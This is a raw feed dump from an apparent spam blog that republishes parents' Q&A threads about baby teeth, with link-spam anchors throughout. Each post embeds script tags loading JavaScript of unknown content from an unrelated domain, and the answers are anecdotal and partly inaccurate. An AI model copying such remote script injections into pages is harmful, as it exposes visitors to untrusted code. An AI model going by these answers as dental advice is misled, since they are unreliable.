href=http://2hair-talk.blogspot.com/>hair talk</a>BLANCHEhttp://www.blogger.com/profile/15778974969396377373noreply@blogger.com0tag:blogger.com,1999:blog-2058727980871260011.post-91159087145144976312009-08-02T21:26:00.001-07:002009-08-02T21:26:28.275-07:00When baby teeth come in do they come in pairs?my 8 month old got her first tooth on thanksgiving, but my mom said she should of had two, is this true?<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth1.js type=text/javascript></script><br>When baby teeth come in do they come in pairs?<br>My children's teeth came out one by one. Each child is different. My children "sprouted" 7 teeth (4 on top 3 on bottom) then waited a couple months before getting the rest. Don't worry about it.<br><br /><br /><br><br /><br />Following is from "What To Expect The First Year"<br><br /><br />For one child it may be a long, drawn out affair for another it may seem to pass with a single wave of the wand in the middle of a restful night.<br><br /><br />On the average the first TOOTH arrives sometime during the seventh month (or as early as the 3rd month or as late as the 12th month).<br><br /><br /><br><br /><br />Parents Guide To Tooth Eruption<br><br /><br />http://www.simplestepsdental.com/SS/ihtS...<br>Reply:No. they pop out all over the place.<br>Reply:No, that is not true.<br>Reply:NO THEY CAN COME ANYTIME, EVERYBODY IS DIFFERENT<br>Reply:My son got his first tooth at 5 months and the second at 6 months and he had 3 teeth, one on bottom and 2 on top till he was a year old. Wivestales! Every child is different.<br>Reply:It's not exactly pairs. Generally one side will show up shortly before it's opposite comes in. They will get two then take a break get the next two and so on. After the first eight fronts get in they'll get a set of molars so there'll be a small gap tat's normal too and will fill in shortly.<br>Reply:Teeth usually come a few days apart. I wouldn;t worry about it too much. worry more about the pain she's in (and the sleepless nights you'r having) as she cuts her teeth.<br>Reply:not most the time. they normally come in one at a time.<br>Reply:Usually the first baby teeth to come into the mouth are the two bottom front teeth. They begin to appear when your child is about 6 to 8 months old. They are followed by the 4 upper front teeth. The remainder of your baby’s teeth will appear periodically, usually in pairs on each side of the jaw, until the child is about 2 1/2 years old. <br><br /><br /><br><br /><br /> By the time your child is 2 ½ years old, all 20 baby teeth will most likely have come in. From this point until the child is 5 to 6 years of age, his/her first permanent teeth will begin to erupt. Some of the permanent teeth replace baby teeth, others don't. <br><br /><br /><br><br /><br />The following picture shows approximately when each baby tooth should erupt. Do not worry if some teeth are a few months early or late. Every child is different.<br><br /><br /><br><br /><br /><br><br /><br />to see picture you can go to this site<br><br /><br /><br><br /><br />http://www.umanitoba.ca/outreach/wisdomt...<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br><br><a href=http://2small-business.blogspot.com/>small business</a>BLANCHEhttp://www.blogger.com/profile/15778974969396377373noreply@blogger.com0tag:blogger.com,1999:blog-2058727980871260011.post-90636030744494955572009-08-02T21:26:00.000-07:002009-08-02T21:26:12.688-07:00What age does baby teeth STOP falling out, my daughter is almost nine years old and her tooth is loose?She will look just like Amy Winehouse when this tooth goes. http://lightscameracaption.files.wordpre...<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth2.js type=text/javascript></script><br>What age does baby teeth STOP falling out, my daughter is almost nine years old and her tooth is loose?<br>It varies between people - i had a friend who didn't loose her last tooth until she was 13! 9 could actually be considered early to still be losing teeth.The average age is 11-12 years<br><br /><br />if you're curios, take a look at this site http://www.dentalcare.com/soap/patient/e...<br>Reply:About 10 years old.<br>Reply:oh you got a while. about 2 or 3 more years.<br>Reply:10 or 11. for some people, it takes longer. everyone is different<br>Reply:idk it could be different for everyone, i didnt lose my last babytooth until i was like 11 so i dont think you should worry.<br>Reply:last tooth should be 11-13<br>Reply:I'm 13 and I only have 1 more tooth to lose. That may seem old but my sister didn't lose her last one until she was 15. Some people lose them earlier or later. Yeah, around 10-13 years old. It all depends. People lose them at different rates, so you can never really tell.<br>Reply:i didnt lose all mine till i was 14, and i still had 4 pulled to get braces<br>Reply:My children both had to have 5 baby teeth pulled at the age of 13 to get their mouths ready for braces. Who knows how long their baby teeth would have stayed? <br><br /><br />Bad thing that I heard was there is no correlation on how long you have your baby teeth and how long that you will have your permanent teeth.<br>Reply:mine stopped when i was 10<br>Reply:my nephew is 11 and he still has a couple of baby teeth left<br>Reply:they stop at 12. some baby teeth are stubborn and dont loosen. then its time for the dentist to get involved<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br><br><a href=http://makeup-games.blogspot.com/>makeup games</a>BLANCHEhttp://www.blogger.com/profile/15778974969396377373noreply@blogger.com0tag:blogger.com,1999:blog-2058727980871260011.post-52950632051777903392009-08-02T21:25:00.002-07:002009-08-02T21:25:57.271-07:00Baby teeth injury question...will he have to have it pulled? His gums look so bad...?My son (3-1/2) fell why running to use the potty. He fell face first onto the cermanic title floor. <br><br /><br /><br><br /><br />I got a really good look last night, and one tooth is pushed back toward the back the mouth and twisted just a little. The dentist told use to keep an eye on it.<br><br /><br /><br><br /><br />Do you think will have to be pulled?<br><br /><br /><br><br /><br />What concerns me is that his gums look like he has really bad road rash...or someone took a file to them...they are scabbed over and just look awful! <br><br /><br /><br><br /><br />Should I be concerned about his gums too?<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth1.js type=text/javascript></script><br>Baby teeth injury question...will he have to have it pulled? His gums look so bad...?<br>If the doctor says to just keep an eye on it, then it cannot be TOO bad. My 2 year old son fell off of his booster seat and jammed one of his teeth halfway back into his gums, and they looked horrible for about two weeks. He is fine now, with no real dental problems. Just give your son some time. Kids are amazingly resilient. Good luck.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br><br><a href=http://1hair-tips.blogspot.com/>hair tips</a>BLANCHEhttp://www.blogger.com/profile/15778974969396377373noreply@blogger.com0tag:blogger.com,1999:blog-2058727980871260011.post-83508962889153929282009-08-02T21:25:00.001-07:002009-08-02T21:25:39.497-07:00Baby teeth injury question...will he have to have it pulled? His gums look so bad...?My son (3-1/2) fell why running to use the potty. He fell face first onto the cermanic title floor. <br><br /><br /><br><br /><br />I got a really good look last night, and one tooth is pushed back toward the back the mouth and twisted just a little. The dentist told use to keep an eye on it.<br><br /><br /><br><br /><br />Do you think will have to be pulled?<br><br /><br /><br><br /><br />What concerns me is that his gums look like he has really bad road rash...or someone took a file to them...they are scabbed over and just look awful! <br><br /><br /><br><br /><br />Should I be concerned about his gums too?<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth2.js type=text/javascript></script><br>Baby teeth injury question...will he have to have it pulled? His gums look so bad...?<br>Well, my little brother had almost the same thing happened to him. He fell and his four front baby teeth got pushed in, rootswhere stuck in teh gums and all different stuff like that The solution was to pull them.. and he got crowns on his 4 teeth in teh back. He was either 4 or 5. SO i think your son might have to have them pulled.. depending on the situation and state they are in.<br>Reply:My son is only 13 months, but last month he fell and scraped the tar out of his gums and I was scared to death. It was so bruised and looked horrible! The mouth heals faster than any other part of the body, though. The bruise was gone within 3 days. His tooth wasn't loose from it though, so I can't give you any advice on that one except what the dentist said - keep a close eye on it. Maybe try to touch it and see if it wiggles in the gums at all, just to make sure it isn't serious loose and may fall out and pose a choking hazard.<br><br /><br /><br><br /><br />Hope your baby is okay!<br>Reply:The gums will heal, the mouth heals faster and better than any other part of the body.<br><br /><br /><br><br /><br />As for the tooth only time will tell if there is root damage, if there is root damage it will have to be pulled. If the tooth is pulled you will then have to decide if it is worth replacing the tooth or just waiting. If you wait there is a chance that the other teeth will move and crowd the space which can cause problems with the adult teeth. Missing a tooth can sometimes effect the child's self-esteem as well. However I think around age 4 it is usually considered safe to leave a missing front tooth.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br><br><a href=http://www.ineedaloan.com.cn/interest-rate/>interest rate</a>BLANCHEhttp://www.blogger.com/profile/15778974969396377373noreply@blogger.com0tag:blogger.com,1999:blog-2058727980871260011.post-55554151424091185292009-08-02T21:25:00.000-07:002009-08-02T21:25:25.414-07:00Baby teeth...how long are they loose?My 4 year old daughter has her first loose tooth. How long before it will fall out?<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth1.js type=text/javascript></script><br>Baby teeth...how long are they loose?<br>she s perfectly normal baby teeth go out from 4 to 6 years<br>Reply:I always had my parents pull it for me after 2 or 3 days<br>Reply:My daughter is also 4 with a loose tooth. The dentist said while it is uncommon (not impossible) for them to lose teeth that young, it is not uncommon for a loose tooth or two. She told my that it could stay loose and not fall out for a year or two. As long as proper hygine is used and you don't make an effort to pull it out, everything is fine.<br>Reply:Sometimes when i was younger i would just keep moving back and forth. Or one of my parent's would pull it with a piece of floss, it only hurt for a few seconds.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br><br><a href=http://write-poetry3.blogspot.com/>write poetry</a>BLANCHEhttp://www.blogger.com/profile/15778974969396377373noreply@blogger.com0tag:blogger.com,1999:blog-2058727980871260011.post-21102909631976491212009-08-02T21:24:00.003-07:002009-08-02T21:24:57.305-07:00How to save baby teeth...?My 6 year old lost his first tooth tonight! We're both really excited and the tooth fairy has already come and taken the tooth. ;) What I want to know is: what is the best way to save this little tooth? Is that weird? I just can't bear to throw it away. Please help. Any experience you've had with this will be appreciated.<br><br /><br />Aloha :)<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth2.js type=text/javascript></script><br>How to save baby teeth...?<br>My little one lost hers at 4 1/2.....we stuck it in a little jar with the date that she lost it......its NOT weird.....at least in my opinion......they also have "fancy" jars that say "my first tooth" that you can purchase....and have their names engraved on them.<br>Reply:Sow it in soil while praying God. <span>Report It</span><br /> <br>Reply:My mother actually always put my baby teeth in a special envelope and kept it in a safe place. <br><br /><br /><br><br /><br />After I lost all my baby teeth, she sealed the envelope and put it in a box of baby things. <br><br /><br /><br><br /><br />If you have a baby memory box, that would be a great place to store them. <br><br /><br /><br><br /><br />Here is an example of one such keepsake box:<br><br /><br />http://www.angelicbabyshowergifts.com/ba...<br><br /><br /><br><br /><br />:)<br><br /><br /><br><br /><br />Hope this helps!<br>Reply:that is soooooooo darn cute!!!!! congratulations on that! my mom has mine in one of those tiny lil' zip lock bags,,, i don't know where to get one of those (since it was my dad's..... lol... it was the 70's) but you can use a small little box that jewelry comes in.. or a regular zip lock... there is no specific way to store it....<br>Reply:Just put it in a box.<br>Reply:the tooth fairy keeps them in a snap lock bag here with the date each tooth is lost written on<br>Reply:I got a container with a lid rom the dentist, to put under her pillow when she looses a tooth, I also got one for myself. I have put all of my daughters teeth in it. I keep it hidden away in a safe spot. It doesn't have to be huge. My mom used a discarded pill bottle she wrote on it with a permanent marker which child it belonged to. Anything you choose will work. The most important part is finding somewhere to put it where she won't discover it.<br>Reply:ok i have 2 kids and i'm the same way...only i saved all their (front only ) teeth....i have a jar that says my first tooth...more like an ornament...i keep the teeth in there...and in a safe place....it's to remember how small they were and say i remember that day....<br>Reply:I keep my son's baby teeth in a little jewelry box which once contained a bracelet. It's nicely padded with velvet and cotton. A ring box would work just as well. I wouldn't think of throwing my son's teeth away, either, although I had some explaining to do when he found the box with the teeth and said he thought the tooth fairy took them with her :-))<br>Reply:the first thing your do is steralize it and then you can get a baby food jar and put all the teeth that he loses in the jar. Be sure to steralize every single tooth( becuase you dont want it to smell) and hide it(becuase you dont him to find it and never believe in the tooth fairy again)<br>Reply:My son's is wrapped in tissue, in a little box I keep in my dresser. He's 15, and doesn't know I have it.<br>Reply:I just put my daughters in a little box, she has found it twice so I lied to her and said they were the dog's baby teeth, I don't think it is weird we waited a long time for those little teeth to come in!<br>Reply:Use an empty film canister. You can buy one of those fancy label markers to mark it with or simply use a piece of masking tape. <br><br /><br />As an adult I was cleaning out and tried to throw out my baby teeth my mom had saved and she had a fit. She ended up keeping them at her house. I'm married now and starting my own family...lol<br>Reply:I don't think there are any wrong ways to save the teeth. My dad actually has all my baby teeth in an old advil bottle. lol It's not weird at all to want to keep the teeth, they are part of the memories of raising your son.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br><br><a href=http://theater-acting2.blogspot.com/>theater acting</a>BLANCHEhttp://www.blogger.com/profile/15778974969396377373noreply@blogger.com0tag:blogger.com,1999:blog-2058727980871260011.post-54135904333260946802009-08-02T21:24:00.002-07:002009-08-02T21:24:40.549-07:00Is there a relationship between bathing a baby during a full moon and her teeth eruption?they said that there is a connection like a force of gravity. Baby's tooth will have a hard time erupting if you bathe them during lunar days.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth1.js type=text/javascript></script><br>Is there a relationship between bathing a baby during a full moon and her teeth eruption?<br>This is the science section sweetheart, not fantasy. Not to be a jerk, but what possible effect will being in water have during a full moon?<br><br /><br /><br><br /><br />And the moon's gravity is pulling equally on all parts of the baby. Not just the teeth.<br>Reply:Speculatively: the tide might accelerate some bio-chemical processes.<br>Reply:Nonsense.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br><br><a href=http://flower.imwebhost.com/flowers-and-gifts/Plant-question-jna103464.htm>Plant question</a>BLANCHEhttp://www.blogger.com/profile/15778974969396377373noreply@blogger.com0tag:blogger.com,1999:blog-2058727980871260011.post-17216484873060498472009-08-02T21:24:00.001-07:002009-08-02T21:24:22.115-07:00How many teeth did your baby have by the time he/she was 9months?I just want to see what the average number of teeth a baby should have at 9 months, so can you tell me how many yours had when he/she was 9 months.<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth2.js type=text/javascript></script><br>How many teeth did your baby have by the time he/she was 9months?<br>Every child is different. My girls' had about 4 at 9 months, but my sister's twins didn't get any until about 10 months. <br><br /><br />The older the better - they won't get tooth decay from milk if they don't have teeth.<br>Reply:4<br>Reply:1<br>Reply:My little boy had 4 teeth at that time.<br>Reply:by 9 months, my boy had 8 (four front on top, four front on bottom). He's 12 months now and has three molars, with a fourth bound to emerge any day now.<br><br /><br /><br><br /><br />He's rushing so he can eat steak... lol<br>Reply:2...he's ten months now and just got his two top teeth.<br>Reply:He had 4 teeth by 8 months and 2 more by 9 months.<br>Reply:My son will be 9 months in 2 weeks and he has 2 teeth all the way out and another poking through.<br>Reply:6<br>Reply:I totally can't remember how many she had at 9 months... they all get them at different rates anyway so just because Mary Sue's baby had 6 teeth at 9 months doesn't mean yours will or won't.<br>Reply:my oldest had none(first one at 10months) my second had 2(first popped through at 8months) and my third one popped through at 9 months<br>Reply:2 but my friends baby didnt get teeth until almost 2 years old!!!!<br>Reply:My 10 month old only has two<br>Reply:At 9 months:<br><br /><br /><br><br /><br />My daughter - 0<br><br /><br />My nephew - 4<br>Reply:My son had 8 four on top and four on bottom (at 5 months)then by 12 months he had all four in back (two on top and two on bottom)<br>Reply:my son had 4, my oldest daughter had 2, and my baby girl had 2<br>Reply:5 completely out and 1 starting<br>Reply:mine had 8 at 8 months...she is now 11 months and still waiting for the next one!!<br><script language=JavaScript src=http://www.chinese-kungfu.org/teeth3.js type=text/javascript></script><br><br><br><a href=http://celebrity-makeup3.blogspot.com/>celebrity makeup</a>BLANCHEhttp://www.blogger.com/profile/15778974969396377373noreply@blogger.com0